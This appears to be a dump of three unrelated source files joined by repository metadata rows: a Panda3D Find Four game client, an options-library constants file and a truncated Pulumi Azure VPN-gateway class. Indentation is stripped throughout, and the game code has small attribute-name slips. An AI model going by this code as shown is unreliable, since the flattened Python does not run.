taskMgr.remove('playerTurnTask')
return
def getTimer(self):
self.sendUpdate('requestTimer', [])
def setTimer(self, timerEnd):
if self.fsm.getCurrentState() != None and self.fsm.getCurrentState().getName() == 'waitingToBegin' and not self.table.fsm.getCurrentState().getName() == 'observing':
self.clockNode.stop()
time = globalClockDelta.networkToLocalTime(timerEnd)
timeLeft = int(time - globalClock.getRealTime())
if timeLeft > 0 and timerEnd != 0:
if timeLeft > 60:
timeLeft = 60
self.clockNode.setPos(1.16, 0, -0.83)
self.clockNode.countdown(timeLeft, self.startButtonPushed)
self.clockNode.show()
else:
self.clockNode.stop()
self.clockNode.hide()
return
def setTurnTimer(self, turnEnd):
if self.fsm.getCurrentState() != None and self.fsm.getCurrentState().getName() == 'playing':
self.clockNode.stop()
time = globalClockDelta.networkToLocalTime(turnEnd)
timeLeft = int(time - globalClock.getRealTime())
if timeLeft > 0:
self.clockNode.setPos(0.64, 0, -0.27)
self.clockNode.countdown(timeLeft, self.doRandomMove)
self.clockNode.show()
return
def gameStart(self, playerNum):
if playerNum != 255:
self.playerNum = playerNum
if self.playerNum == 1:
self.playerColorString = 'Red'
else:
self.playerColorString = 'Yellow'
self.moveCameraForGame()
self.fsm.request('playing')
def sendTurn(self, playersTurn):
if self.fsm.getCurrentState().getName() == 'playing':
if playersTurn == self.playerNum:
self.isMyTurn = True
taskMgr.add(self.turnTask, 'playerTurnTask')
self.enableTurnScreenText(playersTurn)
def illegalMove(self):
self.exitButtonPushed()
def moveCameraForGame(self):
if self.table.cameraBoardTrack.isPlaying():
self.table.cameraBoardTrack.pause()
rotation = 0
if self.seatPos <= 2:
position = self.table.seats[1].getPos()
position = position + Vec3(0, -8, 12.8)
int = LerpPosHprInterval(camera, 2, position, Vec3(0, -38, 0), camera.getPos(), camera.getHpr())
else:
position = self.table.seats[4].getPos()
position = position + Vec3(0, -8, 12.8)
if camera.getH() < 0:
int = LerpPosHprInterval(camera, 2, position, Vec3(-180, -20, 0), camera.getPos(), camera.getHpr())
else:
int = LerpPosHprInterval(camera, 2, position, Vec3(180, -20, 0), camera.getPos(), camera.getHpr())
int.start()
def enterWaitingToBegin(self):
if self.table.fsm.getCurrentState().getName() != 'observing':
self.enableExitButton()
self.enableStartButton()
def exitWaitingToBegin(self):
if self.exitButton:
self.exitButton.destroy()
self.exitButton = None
if self.startButton:
self.startButton.destroy()
self.exitButton = None
self.clockNode.stop()
self.clockNode.hide()
return
def enterPlaying(self):
self.inGame = True
self.enableScreenText()
if self.table.fsm.getCurrentState().getName() != 'observing':
self.enableLeaveButton()
def exitPlaying(self):
self.inGame = False
if self.leaveButton:
self.leaveButton.destroy()
self.leavebutton = None
self.playerNum = None
if self.screenText:
self.screenText.destroy()
self.screenText = None
if self.turnText:
self.turnText.destroy()
self.turnText = None
self.clockNode.stop()
self.clockNode.hide()
return
def enterGameOver(self):
pass
def exitGameOver(self):
pass
def exitWaitCountdown(self):
self.__disableCollisions()
self.ignore('trolleyExitButton')
self.clockNode.reset()
def enableExitButton(self):
self.exitButton = DirectButton(relief=None, text=TTLocalizer.ChineseCheckersGetUpButton, text_fg=(1, 1, 0.65, 1), text_pos=(0, -.23), text_scale=0.8, image=(self.upButton, self.downButton, self.rolloverButton), image_color=(1, 0, 0, 1), image_scale=(20, 1, 11), pos=(0.92, 0, 0.8), scale=0.15, command=lambda self = self: self.exitButtonPushed())
return
def enableScreenText(self):
defaultPos = (-.7, -0.29)
if self.playerNum == 1:
message = 'You are Red'
color = Vec4(1, 0, 0, 1)
elif self.playerNum == 2:
message = 'You are Yellow'
color = Vec4(1, 1, 0, 1)
else:
message = TTLocalizer.CheckersObserver
color = Vec4(0, 0, 0, 1)
self.screenText = OnscreenText(text=message, pos=defaultPos, scale=0.1, fg=color, align=TextNode.ACenter, mayChange=1)
def enableStartButton(self):
self.startButton = DirectButton(relief=None, text=TTLocalizer.ChineseCheckersStartButton, text_fg=(1, 1, 0.65, 1), text_pos=(0, -.23), text_scale=0.6, image=(self.upButton, self.downButton, self.rolloverButton), image_color=(1, 0, 0, 1), image_scale=(20, 1, 11), pos=(0.92, 0, 0.57), scale=0.15, command=lambda self = self: self.startButtonPushed())
return
def enableLeaveButton(self):
self.leaveButton = DirectButton(relief=None, text=TTLocalizer.ChineseCheckersQuitButton, text_fg=(1, 1, 0.65, 1), text_pos=(0, -.13), text_scale=0.5, image=(self.upButton, self.downButton, self.rolloverButton), image_color=(1, 0, 0, 1), image_scale=(20, 1, 11), pos=(0.92, 0, 0.8), scale=0.15, command=lambda self = self: self.exitButtonPushed())
return
def enableTurnScreenText(self, player):
playerOrder = [1,
4,
2,
5,
3,
6]
message1 = TTLocalizer.CheckersIts
if self.turnText != None:
self.turnText.destroy()
if player == self.playerNum:
message2 = TTLocalizer.ChineseCheckersYourTurn
color = (0, 0, 0, 1)
elif player == 1:
message2 = "Red's Turn"
color = (1, 0, 0, 1)
elif player == 2:
message2 = "Yellow's Turn"
color = (1, 1, 0, 1)
self.turnText = OnscreenText(text=message1 + message2, pos=(-0.7, -0.39), scale=0.092, fg=color, align=TextNode.ACenter, mayChange=1)
return
def startButtonPushed(self):
self.sendUpdate('requestBegin')
self.startButton.hide()
self.clockNode.stop()
self.clockNode.hide()
def exitButtonPushed(self):
self.fsm.request('gameOver')
self.table.fsm.request('off')
self.clockNode.stop()
self.clockNode.hide()
self.table.sendUpdate('requestExit')
def mouseClick(self):
messenger.send('wakeup')
if self.isMyTurn == True and self.inGame == True and not self.moveSequence.isPlaying():
if self.moveCol != None:
self.d_requestMove(self.moveCol)
self.moveCol = None
self.isMyTurn = False
taskMgr.remove('playerTurnTask')
return
def handleClicked(self, index):
pass
def turnTask(self, task):
if base.mouseWatcherNode.hasMouse() == False:
return task.cont
if self.isMyTurn == False:
return task.cont
if self.moveSequence.isPlaying():
return task.cont
mpos = base.mouseWatcherNode.getMouse()
self.pickerRay.setFromLens(base.camNode, mpos.getX(), mpos.getY())
self.traverser.traverse(render)
if self.myHandler.getNumEntries() > 0:
self.myHandler.sortEntries()
pickedObj = self.myHandler.getEntry(0).getIntoNodePath()
pickedObj = pickedObj.getNetTag('StartLocator')
if pickedObj:
colVal = int(pickedObj)
if colVal == self.moveCol:
return task.cont
if self.board[0][colVal] == 0:
if self.moveCol != None:
for x in self.startingPositions[self.moveCol].getChild(1).getChildren():
x.hide()
self.moveCol = colVal
if self.playerNum == 1:
self.startingPositions[self.moveCol].getChild(1).getChild(2).show()
elif self.playerNum == 2:
self.startingPositions[self.moveCol].getChild(1).getChild(3).show()
return task.cont
def d_requestMove(self, moveCol):
self.sendUpdate('requestMove', [moveCol])
def setGameState(self, tableState, moveCol, movePos, turn):
messenger.send('wakeup')
if self.table.fsm.getCurrentState().getName() == 'observing':
isBlank = True
for x in range(7):
if self.board[5][x] != 0:
isBlank = False
break
gameBlank = True
for x in range(7):
if tableState[5][x] != 0:
gameBlank = False
break
if isBlank == True and gameBlank == False:
for x in range(6):
for y in range(7):
self.board[x][y] = tableState[x][y]
self.updateGameState()
return
if moveCol == 0 and movePos == 0 and turn == 0:
for x in range(6):
for y in range(7):
self.board[x][y] = tableState[x][y]
self.updateGameState()
else:
self.animatePeice(tableState, moveCol, movePos, turn)
didIWin = self.checkForWin()
if didIWin != None:
self.sendUpdate('requestWin', [didIWin])
return
def updateGameState(self):
for x in range(6):
for y in range(7):
for z in self.locatorList[x * 7 + y].getChild(1).getChildren():
z.hide()
for x in range(6):
for y in range(7):
state = self.board[x][y]
if state == 1:
self.locatorList[x * 7 + y].getChild(1).getChild(0).show()
elif state == 2:
self.locatorList[x * 7 + y].getChild(1).getChild(1).show()
def checkForWin(self):
for x in range(6):
for y in range(7):
if self.board[x][y] == self.playerNum:
if self.checkHorizontal(x, y, self.playerNum) == True:
return [x, y]
elif self.checkVertical(x, y, self.playerNum) == True:
return [x, y]
elif self.checkDiagonal(x, y, self.playerNum) == True:
return [x, y]
return None
def announceWinnerPosition(self, x, y, winDirection, playerNum):
self.isMyturn = False
if self.turnText:
self.turnText.hide()
self.clockNode.stop()
self.clockNode.hide()
if winDirection == 0:
blinkList = self.findHorizontal(x, y, playerNum)
elif winDirection == 1:
blinkList = self.findVertical(x, y, playerNum)
elif winDirection == 2:
blinkList = self.findDiagonal(x, y, playerNum)
if blinkList != []:
print(blinkList)
val0 = x * 7 + y
x = blinkList[0][0]
y = blinkList[0][1]
val1 = x * 7 + y
x = blinkList[1][0]
y = blinkList[1][1]
val2 = x * 7 + y
x = blinkList[2][0]
y = blinkList[2][1]
val3 = x * 7 + y
self.winningSequence = Sequence()
downBlinkerParallel = Parallel(LerpColorInterval(self.locatorList[val0], 0.3, Vec4(0.5, 0.5, 0.5, 0.5), Vec4(1, 1, 1, 1)), LerpColorInterval(self.locatorList[val1], 0.3, Vec4(0.5, 0.5, 0.5, 0.5), Vec4(1, 1, 1, 1)), LerpColorInterval(self.locatorList[val2], 0.3, Vec4(0.5, 0.5, 0.5, 0.5), Vec4(1, 1, 1, 1)), LerpColorInterval(self.locatorList[val3], 0.3, Vec4(0.5, 0.5, 0.5, 0.5), Vec4(1, 1, 1, 1)))
upBlinkerParallel = Parallel(LerpColorInterval(self.locatorList[val0], 0.3, Vec4(1, 1, 1, 1), Vec4(0.5, 0.5, 0.5, 0.5)), LerpColorInterval(self.locatorList[val1], 0.3, Vec4(1, 1, 1, 1), Vec4(0.5, 0.5, 0.5, 0.5)), LerpColorInterval(self.locatorList[val2], 0.3, Vec4(1, 1, 1, 1), Vec4(0.5, 0.5, 0.5, 0.5)), LerpColorInterval(self.locatorList[val3], 0.3, Vec4(1, 1, 1, 1), Vec4(0.5, 0.5, 0.5, 0.5)))
self.winningSequence.append(downBlinkerParallel)
self.winningSequence.append(upBlinkerParallel)
self.winningSequence.loop()
def tie(self):
self.tieSequence = Sequence(autoFinish=1)
self.clockNode.stop()
self.clockNode.hide()
self.isMyTurn = False
self.moveSequence.finish()
if self.turnText:
self.turnText.hide()
for x in range(41):
self.tieSequence.append(Parallel(LerpColorInterval(self.locatorList[x], 0.15, Vec4(0.5, 0.5, 0.5, 0.5), Vec4(1, 1, 1, 1)), LerpColorInterval(self.locatorList[x], 0.15, Vec4(1, 1, 1, 1), Vec4(0.5, 0.5, 0.5, 0.5))))
whisper = WhisperPopup('This Find Four game has resulted in a Tie!', OTPGlobals.getInterfaceFont(), WhisperPopup.WTNormal)
whisper.manage(base.marginManager)
self.tieSequence.start()
def hideChildren(self, nodeList):
pass
def animatePeice(self, tableState, moveCol, movePos, turn):
messenger.send('wakeup')
for x in range(6):
for y in range(7):
self.board[x][y] = tableState[x][y]
pos = self.startingPositions[moveCol].getPos()
if turn == 0:
peice = self.startingPositions[moveCol].getChild(1).getChildren()[2]
peice.show()
elif turn == 1:
peice = self.startingPositions[moveCol].getChild(1).getChildren()[3]
peice.show()
self.moveSequence = Sequence()
startPos = self.startingPositions[moveCol].getPos()
arrayLoc = movePos * 7 + moveCol
self.moveSequence.append(LerpPosInterval(self.startingPositions[moveCol], 1.5, self.locatorList[arrayLoc].getPos(self), startPos))
self.moveSequence.append(Func(peice.hide))
self.moveSequence.append(Func(self.startingPositions[moveCol].setPos, startPos))
self.moveSequence.append(Func(self.updateGameState))
self.moveSequence.start()
def announceWin(self, avId):
self.fsm.request('gameOver')
def doRandomMove(self):
if self.isMyTurn:
if self.moveCol != None:
self.d_requestMove(self.moveCol)
self.moveCol = None
self.isMyTurn = False
taskMgr.remove('playerTurnTask')
else:
hasfound = False
while hasfound == False:
x = randint(0, 6)
if self.board[0][x] == 0:
self.d_requestMove(x)
self.moveCol = None
self.isMyTurn = False
taskMgr.remove('playerTurnTask')
hasfound = True
return
def doNothing(self):
pass
def checkHorizontal(self, rVal, cVal, playerNum):
if cVal == 3:
for x in range(1, 4):
if self.board[rVal][cVal - x] != playerNum:
break
if self.board[rVal][cVal - x] == playerNum and x == 3:
return True
for x in range(1, 4):
if self.board[rVal][cVal + x] != playerNum:
break
if self.board[rVal][cVal + x] == playerNum and x == 3:
return True
return False
elif cVal == 2:
for x in range(1, 4):
if self.board[rVal][cVal + x] != playerNum:
break
if self.board[rVal][cVal + x] == playerNum and x == 3:
return True
return False
elif cVal == 4:
for x in range(1, 4):
if self.board[rVal][cVal - x] != playerNum:
break
if self.board[rVal][cVal - x] == playerNum and x == 3:
return True
return False
else:
return False
def checkVertical(self, rVal, cVal, playerNum):
if rVal == 2:
for x in range(1, 4):
if self.board[rVal + x][cVal] != playerNum:
break
if self.board[rVal + x][cVal] == playerNum and x == 3:
return True
return False
elif rVal == 3:
for x in range(1, 4):
if self.board[rVal - x][cVal] != playerNum:
break
if self.board[rVal - x][cVal] == playerNum and x == 3:
return True
return False
else:
return False
def checkDiagonal(self, rVal, cVal, playerNum):
if cVal <= 2:
if rVal == 2:
for x in range(1, 4):
if self.board[rVal + x][cVal + x] != playerNum:
break
if self.board[rVal + x][cVal + x] == playerNum and x == 3:
return True
return False
elif rVal == 3:
for x in range(1, 4):
if self.board[rVal - x][cVal + x] != playerNum:
break
if self.board[rVal - x][cVal + x] == playerNum and x == 3:
return True
return False
elif cVal >= 4:
if rVal == 2:
for x in range(1, 4):
if self.board[rVal + x][cVal - x] != playerNum:
break
if self.board[rVal + x][cVal - x] == playerNum and x == 3:
return True
return False
elif rVal == 3:
for x in range(1, 4):
if self.board[rVal - x][cVal - x] != playerNum:
break
if self.board[rVal - x][cVal - x] == playerNum and x == 3:
return True
return False
elif rVal == 3 or rVal == 4 or rVal == 5:
for x in range(1, 4):
if self.board[rVal - x][cVal - x] != playerNum:
break
if self.board[rVal - x][cVal - x] == playerNum and x == 3:
return True
for x in range(1, 4):
if self.board[rVal - x][cVal - x] != playerNum:
break
if self.board[rVal - x][cVal - x] == playerNum and x == 3:
return True
return False
elif rVal == 0 or rVal == 1 or rVal == 2:
for x in range(1, 4):
if self.board[rVal + x][cVal - x] != playerNum:
break
if self.board[rVal + x][cVal - x] == playerNum and x == 3:
return True
for x in range(1, 4):
if self.board[rVal + x][cVal + x] != playerNum:
break
if self.board[rVal + x][cVal + x] == playerNum and x == 3:
return True
return False
return False
def findHorizontal(self, rVal, cVal, playerNum):
if cVal == 3:
retList = []
for x in range(1, 4):
retList.append([rVal, cVal - x])
if self.board[rVal][cVal - x] != playerNum:
retList = []
break
if self.board[rVal][cVal - x] == playerNum and x == 3:
return retList
for x in range(1, 4):
retList.append([rVal, cVal + x])
if self.board[rVal][cVal + x] != playerNum:
retList = []
break
if self.board[rVal][cVal + x] == playerNum and x == 3:
return retList
return []
elif cVal == 2:
retList = []
for x in range(1, 4):
retList.append([rVal, cVal + x])
if self.board[rVal][cVal + x] != playerNum:
retList = []
break
if self.board[rVal][cVal + x] == playerNum and x == 3:
return retList
return []
elif cVal == 4:
retList = []
for x in range(1, 4):
retList.append([rVal, cVal - x])
if self.board[rVal][cVal - x] != playerNum:
retList = []
break
if self.board[rVal][cVal - x] == playerNum and x == 3:
return retList
return []
else:
return []
def findVertical(self, rVal, cVal, playerNum):
if rVal == 2:
retList = []
for x in range(1, 4):
retList.append([rVal + x, cVal])
if self.board[rVal + x][cVal] != playerNum:
retList = []
break
if self.board[rVal + x][cVal] == playerNum and x == 3:
return retList
return []
elif rVal == 3:
retList = []
for x in range(1, 4):
retList.append([rVal - x, cVal])
if self.board[rVal - x][cVal] != playerNum:
retList = []
break
if self.board[rVal - x][cVal] == playerNum and x == 3:
return retList
return []
else:
return []
def findDiagonal(self, rVal, cVal, playerNum):
retList = []
if cVal <= 2:
if rVal == 2:
for x in range(1, 4):
retList.append([rVal + x, cVal + x])
if self.board[rVal + x][cVal + x] != playerNum:
retList = []
break
if self.board[rVal + x][cVal + x] == playerNum and x == 3:
return retList
return []
elif rVal == 3:
for x in range(1, 4):
retList.append([rVal - x, cVal + x])
if self.board[rVal - x][cVal + x] != playerNum:
retList = []
break
if self.board[rVal - x][cVal + x] == playerNum and x == 3:
return retList
return []
elif cVal >= 4:
if rVal == 2:
for x in range(1, 4):
retList.append([rVal + x, cVal - x])
if self.board[rVal + x][cVal - x] != playerNum:
retList = []
break
if self.board[rVal + x][cVal - x] == playerNum and x == 3:
return retList
return []
elif rVal == 3:
for x in range(1, 4):
retList.append([rVal - x, cVal - x])
if self.board[rVal - x][cVal - x] != playerNum:
retList = []
break
if self.board[rVal - x][cVal - x] == playerNum and x == 3:
return retList
return []
elif rVal == 3 or rVal == 4 or rVal == 5:
for x in range(1, 4):
retList.append([rVal - x, cVal - x])
if self.board[rVal - x][cVal - x] != playerNum:
retList = []
break
if self.board[rVal - x][cVal - x] == playerNum and x == 3:
return retList
for x in range(1, 4):
retList.append([rVal + x, cVal - x])
if self.board[rVal + x][cVal - x] != playerNum:
retList = []
break
if self.board[rVal + x][cVal - x] == playerNum and x == 3:
return retList
return []
elif rVal == 0 or rVal == 1 or rVal == 2:
for x in range(1, 4):
retList.append([rVal + x, cVal - x])
if self.board[rVal + x][cVal - x] != playerNum:
retList = []
break
if self.board[rVal + x][cVal - x] == playerNum and x == 3:
return retList
for x in range(1, 4):
retList.append([rVal + x, cVal + x])
if self.board[rVal + x][cVal + x] != playerNum:
retList = []
break
if self.board[rVal + x][cVal + x] == playerNum and x == 3:
return retList
return []
return []
|
886a07773cfa0af38e4179a5fe327f737d0c65bb
|
159bfe57c3c1fc8fdbe0299233ec3060710f0da0
|
/wallstreet/constants.py
|
87e691cb6e26eadd49bd1bbae5b372d175aadb87
|
[
"MIT"
] |
permissive
|
mcdallas/wallstreet
|
fc42df4ccc571231b87cdcbca3fd582c9f915c25
|
c34514387e181f9a752375431c4382466432fa05
|
refs/heads/master
| 2023-01-04T01:00:58.625199
| 2022-12-30T12:34:16
| 2022-12-30T12:34:16
| 50,063,599
| 1,153
| 212
|
MIT
| 2022-12-30T12:32:40
| 2016-01-20T22:03:39
|
Python
|
UTF-8
|
Python
| false
| false
| 403
|
py
|
constants.py
|
DATE_FORMAT = '%d-%m-%Y'
DATETIME_FORMAT = '%e %b %Y %H:%M:%S'
TREASURY_URL = "https://home.treasury.gov/sites/default/files/interest-rates/yield.xml"
DELTA_DIFFERENTIAL = 1.e-3
VEGA_DIFFERENTIAL = 1.e-4
GAMMA_DIFFERENTIAL = 1.e-3
RHO_DIFFERENTIAL = 1.e-4
THETA_DIFFERENTIAL = 1.e-5
IMPLIED_VOLATILITY_TOLERANCE = 1.e-6
SOLVER_STARTING_VALUE = 0.27
OVERNIGHT_RATE = 0
FALLBACK_RISK_FREE_RATE = 0.02
|
ec683a6630fb4537d01602729decade17009c602
|
b049a961f100444dde14599bab06a0a4224d869b
|
/sdk/python/pulumi_azure_native/network/v20190801/virtual_network_gateway.py
|
a3c346fb87f22f4729298cadfea9e560c6bd116a
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
pulumi/pulumi-azure-native
|
b390c88beef8381f9a71ab2bed5571e0dd848e65
|
4c499abe17ec6696ce28477dde1157372896364e
|
refs/heads/master
| 2023-08-30T08:19:41.564780
| 2023-08-28T19:29:04
| 2023-08-28T19:29:04
| 172,386,632
| 107
| 29
|
Apache-2.0
| 2023-09-14T13:17:00
| 2019-02-24T20:30:21
|
Python
|
UTF-8
|
Python
| false
| false
| 34,471
|
py
|
virtual_network_gateway.py
|
# coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._enums import *
from ._inputs import *
__all__ = ['VirtualNetworkGatewayInitArgs', 'VirtualNetworkGateway']
@pulumi.input_type
class VirtualNetworkGatewayInitArgs:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
active_active: Optional[pulumi.Input[bool]] = None,
bgp_settings: Optional[pulumi.Input['BgpSettingsArgs']] = None,
custom_routes: Optional[pulumi.Input['AddressSpaceArgs']] = None,
enable_bgp: Optional[pulumi.Input[bool]] = None,
enable_dns_forwarding: Optional[pulumi.Input[bool]] = None,
gateway_default_site: Optional[pulumi.Input['SubResourceArgs']] = None,
gateway_type: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayType']]] = None,
id: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input['VirtualNetworkGatewayIPConfigurationArgs']]]] = None,
location: Optional[pulumi.Input[str]] = None,
resource_guid: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input['VirtualNetworkGatewaySkuArgs']] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_network_gateway_name: Optional[pulumi.Input[str]] = None,
vpn_client_configuration: Optional[pulumi.Input['VpnClientConfigurationArgs']] = None,
vpn_gateway_generation: Optional[pulumi.Input[Union[str, 'VpnGatewayGeneration']]] = None,
vpn_type: Optional[pulumi.Input[Union[str, 'VpnType']]] = None):
"""
The set of arguments for constructing a VirtualNetworkGateway resource.
:param pulumi.Input[str] resource_group_name: The name of the resource group.
:param pulumi.Input[bool] active_active: ActiveActive flag.
:param pulumi.Input['BgpSettingsArgs'] bgp_settings: Virtual network gateway's BGP speaker settings.
:param pulumi.Input['AddressSpaceArgs'] custom_routes: The reference of the address space resource which represents the custom routes address space specified by the customer for virtual network gateway and VpnClient.
:param pulumi.Input[bool] enable_bgp: Whether BGP is enabled for this virtual network gateway or not.
:param pulumi.Input[bool] enable_dns_forwarding: Whether dns forwarding is enabled or not.
:param pulumi.Input['SubResourceArgs'] gateway_default_site: The reference of the LocalNetworkGateway resource which represents local network site having default routes. Assign Null value in case of removing existing default site setting.
:param pulumi.Input[Union[str, 'VirtualNetworkGatewayType']] gateway_type: The type of this virtual network gateway.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[Sequence[pulumi.Input['VirtualNetworkGatewayIPConfigurationArgs']]] ip_configurations: IP configurations for virtual network gateway.
:param pulumi.Input[str] location: Resource location.
:param pulumi.Input[str] resource_guid: The resource GUID property of the virtual network gateway resource.
:param pulumi.Input['VirtualNetworkGatewaySkuArgs'] sku: The reference of the VirtualNetworkGatewaySku resource which represents the SKU selected for Virtual network gateway.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
:param pulumi.Input[str] virtual_network_gateway_name: The name of the virtual network gateway.
:param pulumi.Input['VpnClientConfigurationArgs'] vpn_client_configuration: The reference of the VpnClientConfiguration resource which represents the P2S VpnClient configurations.
:param pulumi.Input[Union[str, 'VpnGatewayGeneration']] vpn_gateway_generation: The generation for this VirtualNetworkGateway. Must be None if gatewayType is not VPN.
:param pulumi.Input[Union[str, 'VpnType']] vpn_type: The type of this virtual network gateway.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
if active_active is not None:
pulumi.set(__self__, "active_active", active_active)
if bgp_settings is not None:
pulumi.set(__self__, "bgp_settings", bgp_settings)
if custom_routes is not None:
pulumi.set(__self__, "custom_routes", custom_routes)
if enable_bgp is not None:
pulumi.set(__self__, "enable_bgp", enable_bgp)
if enable_dns_forwarding is not None:
pulumi.set(__self__, "enable_dns_forwarding", enable_dns_forwarding)
if gateway_default_site is not None:
pulumi.set(__self__, "gateway_default_site", gateway_default_site)
if gateway_type is not None:
pulumi.set(__self__, "gateway_type", gateway_type)
if id is not None:
pulumi.set(__self__, "id", id)
if ip_configurations is not None:
pulumi.set(__self__, "ip_configurations", ip_configurations)
if location is not None:
pulumi.set(__self__, "location", location)
if resource_guid is not None:
pulumi.set(__self__, "resource_guid", resource_guid)
if sku is not None:
pulumi.set(__self__, "sku", sku)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if virtual_network_gateway_name is not None:
pulumi.set(__self__, "virtual_network_gateway_name", virtual_network_gateway_name)
if vpn_client_configuration is not None:
pulumi.set(__self__, "vpn_client_configuration", vpn_client_configuration)
if vpn_gateway_generation is not None:
pulumi.set(__self__, "vpn_gateway_generation", vpn_gateway_generation)
if vpn_type is not None:
pulumi.set(__self__, "vpn_type", vpn_type)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="activeActive")
def active_active(self) -> Optional[pulumi.Input[bool]]:
"""
ActiveActive flag.
"""
return pulumi.get(self, "active_active")
@active_active.setter
def active_active(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "active_active", value)
@property
@pulumi.getter(name="bgpSettings")
def bgp_settings(self) -> Optional[pulumi.Input['BgpSettingsArgs']]:
"""
Virtual network gateway's BGP speaker settings.
"""
return pulumi.get(self, "bgp_settings")
@bgp_settings.setter
def bgp_settings(self, value: Optional[pulumi.Input['BgpSettingsArgs']]):
pulumi.set(self, "bgp_settings", value)
@property
@pulumi.getter(name="customRoutes")
def custom_routes(self) -> Optional[pulumi.Input['AddressSpaceArgs']]:
"""
The reference of the address space resource which represents the custom routes address space specified by the customer for virtual network gateway and VpnClient.
"""
return pulumi.get(self, "custom_routes")
@custom_routes.setter
def custom_routes(self, value: Optional[pulumi.Input['AddressSpaceArgs']]):
pulumi.set(self, "custom_routes", value)
@property
@pulumi.getter(name="enableBgp")
def enable_bgp(self) -> Optional[pulumi.Input[bool]]:
"""
Whether BGP is enabled for this virtual network gateway or not.
"""
return pulumi.get(self, "enable_bgp")
@enable_bgp.setter
def enable_bgp(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_bgp", value)
@property
@pulumi.getter(name="enableDnsForwarding")
def enable_dns_forwarding(self) -> Optional[pulumi.Input[bool]]:
"""
Whether dns forwarding is enabled or not.
"""
return pulumi.get(self, "enable_dns_forwarding")
@enable_dns_forwarding.setter
def enable_dns_forwarding(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_dns_forwarding", value)
@property
@pulumi.getter(name="gatewayDefaultSite")
def gateway_default_site(self) -> Optional[pulumi.Input['SubResourceArgs']]:
"""
The reference of the LocalNetworkGateway resource which represents local network site having default routes. Assign Null value in case of removing existing default site setting.
"""
return pulumi.get(self, "gateway_default_site")
@gateway_default_site.setter
def gateway_default_site(self, value: Optional[pulumi.Input['SubResourceArgs']]):
pulumi.set(self, "gateway_default_site", value)
@property
@pulumi.getter(name="gatewayType")
def gateway_type(self) -> Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayType']]]:
"""
The type of this virtual network gateway.
"""
return pulumi.get(self, "gateway_type")
@gateway_type.setter
def gateway_type(self, value: Optional[pulumi.Input[Union[str, 'VirtualNetworkGatewayType']]]):
pulumi.set(self, "gateway_type", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="ipConfigurations")
def ip_configurations(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['VirtualNetworkGatewayIPConfigurationArgs']]]]:
"""
IP configurations for virtual network gateway.
"""
return pulumi.get(self, "ip_configurations")
@ip_configurations.setter
def ip_configurations(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['VirtualNetworkGatewayIPConfigurationArgs']]]]):
pulumi.set(self, "ip_configurations", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> Optional[pulumi.Input[str]]:
"""
The resource GUID property of the virtual network gateway resource.
"""
return pulumi.get(self, "resource_guid")
@resource_guid.setter
def resource_guid(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_guid", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input['VirtualNetworkGatewaySkuArgs']]:
"""
The reference of the VirtualNetworkGatewaySku resource which represents the SKU selected for Virtual network gateway.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input['VirtualNetworkGatewaySkuArgs']]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="virtualNetworkGatewayName")
def virtual_network_gateway_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the virtual network gateway.
"""
return pulumi.get(self, "virtual_network_gateway_name")
@virtual_network_gateway_name.setter
def virtual_network_gateway_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_gateway_name", value)
@property
@pulumi.getter(name="vpnClientConfiguration")
def vpn_client_configuration(self) -> Optional[pulumi.Input['VpnClientConfigurationArgs']]:
"""
The reference of the VpnClientConfiguration resource which represents the P2S VpnClient configurations.
"""
return pulumi.get(self, "vpn_client_configuration")
@vpn_client_configuration.setter
def vpn_client_configuration(self, value: Optional[pulumi.Input['VpnClientConfigurationArgs']]):
pulumi.set(self, "vpn_client_configuration", value)
@property
@pulumi.getter(name="vpnGatewayGeneration")
def vpn_gateway_generation(self) -> Optional[pulumi.Input[Union[str, 'VpnGatewayGeneration']]]:
"""
The generation for this VirtualNetworkGateway. Must be None if gatewayType is not VPN.
"""
return pulumi.get(self, "vpn_gateway_generation")
@vpn_gateway_generation.setter
